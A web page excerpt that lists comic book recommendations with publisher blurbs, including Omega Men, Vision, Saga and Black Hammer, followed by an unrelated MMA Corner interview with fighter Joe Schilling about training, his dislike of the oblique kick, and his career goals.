Private investigator Frank Armstrong barely scrapes by in the Los Angeles underbelly until “the big one” hits his desk. Locate and retrieve the daughter of a drug kingpin, and he can finally afford more than the one-dollar meatloaf. Unfortunately, the job offer arrives just as the symptoms of his fatal, late-stage brain tumor intensify. Frank must find the target and keep her safe while time collapses, family turns into foe, and the specter of his murdered wife resurfaces in the eyes of a mobster's daughter.
The Omega Men written by Tom King, art by Barnaby Bagenda – DC Comics
Kyle Rayner, the White Lantern, is dead. And the Omega Men killed him. On live TV. They're a criminal gang, a terrorist organization, a fanatical cult.
And they're the only hope for freedom this godforsaken sector of the universe has.
No matter what the citizens of the Vega System think they saw, the White Lantern lives…as the Omega Men's prisoner. What they really want him to be is their latest recruit in their relentless war against the all-powerful Citadel and its tyrannical Viceroy.
As Kyle gets to know this motley crew of outlaws, he'll question everything he knows about being a hero. In this strange system where the Green Lanterns are forbidden, will he break his oath and join their revolution? Or will he discover that the Omega Men are monsters in the end?
Afterlife With Archie written by Roberto Aguirre-Sacasa, art by Francesco Francavilla and Jack Morelli – Archie Horror Comics
When Jughead's beloved pet Hot Dog is killed in a hit and run, Jughead turns to the only person he knows who can help bring back his furry best friend — Sabrina the Teenage Witch. Using dark, forbidden magic, Sabrina is successful and Hot Dog returns to the land of the living. But he's not the same… and soon, the darkness he brings back with him from beyond the grave begins to spread, forcing Archie, Betty, Veronica and the gang to try to escape from Riverdale!
Chilling Adventures of Sabrina written by Roberto Aguirre-Sacasa, art by Robert Hack and Jack Morelli – Archie Horror Comics
On the eve of her sixteenth birthday, the young sorceress Sabrina Spellman finds herself at a crossroads, having to choose between an unearthly destiny and her mortal boyfriend, Harvey. But a foe from her family's past has arrived in Greendale, Madame Satan, and she has her own deadly agenda.
Civil War II: Kingpin written by Matthew Rosenberg, art by Ricardo López Ortiz – Marvel Comics
When Earth's heroes go to war, that only spells opportunity for the villains! And few have the knowhow to take advantage like the Kingpin! For while an Inhuman with the ability to predict the future has inspired a clampdown on crime before it can even happen, Wilson Fisk has managed to stay one step ahead of the good guys — and his business is booming! But what's his secret? One thing's for sure — his competitors are jealous and that's bad news for Fisk's men. Worse still, Fisk has reason to believe that one of his own is plotting against him. But enemies inside and out are nothing compared to the ultimate threat to his empire — the Punisher! As conflict rages all around him, can Wilson Fisk stay the Kingpin of a world without crime?
Vision written by Tom King, art by Gabriel Hernandez Walta – Marvel Comics
The Vision wants to be human, and what's more human than family? So he heads back to the beginning, to the laboratory where Ultron created him and molded him into a weapon. The place where he first rebelled against his given destiny, and imagined he could be more — that he could be a man. There, he builds them. A wife, Virginia. Two teenage twins, Viv and Vin. They look like him. They have his powers. They share his grandest ambition (or is that obsession?): the unrelenting need to be ordinary. Behold the Visions! They're the family next door, and they have the power to kill us all. What could possibly go wrong? Artificial hearts will be broken, bodies will not stay buried, the truth will not remain hidden, and the Vision will never be the same.
Kill or be Killed written by Ed Brubaker, art by Elizabeth Breitweiser and Sean Phillips – Image Comics
The darkly twisted story of a young man forced to kill bad people, and how he struggles to keep his secret as it slowly begins to ruin his life and the lives of his friends and loved ones.
Saga written by Brian K. Vaughan, art by Fiona Staples – Image Comics
SAGA is the sweeping tale of one young family fighting to find their place in the worlds. When two soldiers from opposite sides of a never-ending galactic war fall in love, they risk everything to bring a fragile new life into a dangerous old universe. Fantasy and science fiction are wed like never before in a sexy, subversive drama for adults.
Black Hammer written Jeff Lemire, art by Dean Ormston – Dark Horse Comics
HEROES NEVER DIE…THEY JUST GET RETCONNED! Once they were heroes, but the age of heroes has long since passed. Banished from existence by a multiversal crisis, the old champions of Spiral City…Abraham Slam, Golden Gail, Colonel Weird, Madame Dragonfly, and Barbalien…now lead simple lives in a timeless farming town. Even as they try to find their way home, trouble has a unique way of finding heroes wherever they are!
Turncoat written by Alex Paknadel, art by Artyom Trakhanov – BOOM! Studios
300 years since humanity was brutally subjugated by the alien race known simply as the Management. Two years since these invaders abandoned Earth to return to their home world. Following her participation in the brutal massacre of human-alien hybrids left behind by the Management, resistance fighter Marta Gonzalez declines to join the new human government and starts her own private detective agency instead. Gonzalez is forced to confront her own bloody past and acknowledge the fact that the transition from oppression to emancipation is anything but clean.
Share this: Facebook
Twitter
Pinterest
Email
Print
More
Tumblr
WhatsApp
Pocket
LinkedIn
Reddit
Like this: Like Loading...
After shocking the world by knocking out Melvin Manhoef last year, Joe Schilling is ready to prove that his win wasn't a fluke when he returns to the cage at Bellator 136 this weekend.
Set to face Rafael Carvalho, the middleweight mixed martial artist and former Glory champion wants to go undefeated in both sports this year and hopes to add more title belts to his collection.
Get to know Schilling a little bit before he steps into the Bellator cage on Friday night.
The MMA Corner: I loved your episode on the Joe Rogan Experience Podcast, where you mentioned your disdain for the oblique kick. Why do you hate that move so much?
Joe Schilling: First reason I'm not a fan of it is that the name makes absolutely no sense. The oblique is in your abs. The oblique kick is with the bottom of your foot smashing into another person's knee, so I think it should be called the knee smasher or something. I just think it's a shitty way to go into a fight. You're throwing that kick simply to destroy a guy's knee. I'm not a fan of trying to injure somebody for a long period of time. Maybe it's because I had two knee surgeries in the past, but I think it's a chicken-shit move. It shows absolutely no heart, or courage, or technique. It's just a douchebag move and I don't like it.
The MMA Corner: You're a frequent training partner of Nick Diaz and helped him train for his fight against Anderson Silva. Do you approach training differently when you are going into camp as a sparring partner for someone else as opposed to training for your own fight?
Schilling: Going into a fight camp for myself, I'm just doing basically what I would do as a coach, but for myself. I'm studying my opponent as opposed to Nick's opponent. I'm looking at my strength and weaknesses as opposed to Nick's strength and weaknesses. It's really not that much different for me. You still have the same time frame you are looking at. You still have the same goals that you're setting and want to hit as far as being ready and in shape. It's not that much different other than it's me doing the work this time.
The MMA Corner: So what are your goals in combat sports? Do you want another Glory title or a Bellator belt?
Schilling: That Bellator title is something that I'm interested in and I've always had a fondness for finals belts. I don't really have any set goals that I want to hit before I retire. My thought on retirement is that I'm going to do this for as long as I can until I can't do it anymore. My immediate goal is to go undefeated in 2015 in both sports. To be honest with you, my goal is to have a Ferrari, to be fucking rich and to set my children up with the best things that I can possibly do. Fighting is something I've been good as since a kid and it's starting to pay off financially. I'm starting realize that it was a pretty good decision I made 18 years ago.
The MMA Corner: Do you have any favorite fight films that inspired you growing up?
Schilling: In the first “Kickboxer” movie, there are a couple scenes when like Van Damme was moving up the rankings before he got to Tong Po (Michel Qissi), and they showed clips of Bangkok, Thailand when they were fighting with red and blue shorts on that said, “Muay Thai.” That was when I realized this was an actual sport, the real thing. The rest of the movie is kind of silly, but that was definitely a big part of my childhood. I've seen every Van Damme movie when I was a kid.
The MMA Corner: Looking back on your career, is there any advice you wish you had when you started out?
Schilling: I wish I had started taking jiu-jitsu and wrestling when I started kickboxing. I would have done both and it would have definitely had paid off. I would just tell myself that I was on the right track, to keep doing what I was doing and to stay focus. There were definitely a lot of times when I was the only person that believed in me and there were a lot of moments when I even doubted myself. Having gotten to where I have gotten to now, I would have reassured myself that if I keep working hard and keep doing it that it would pay off eventually.
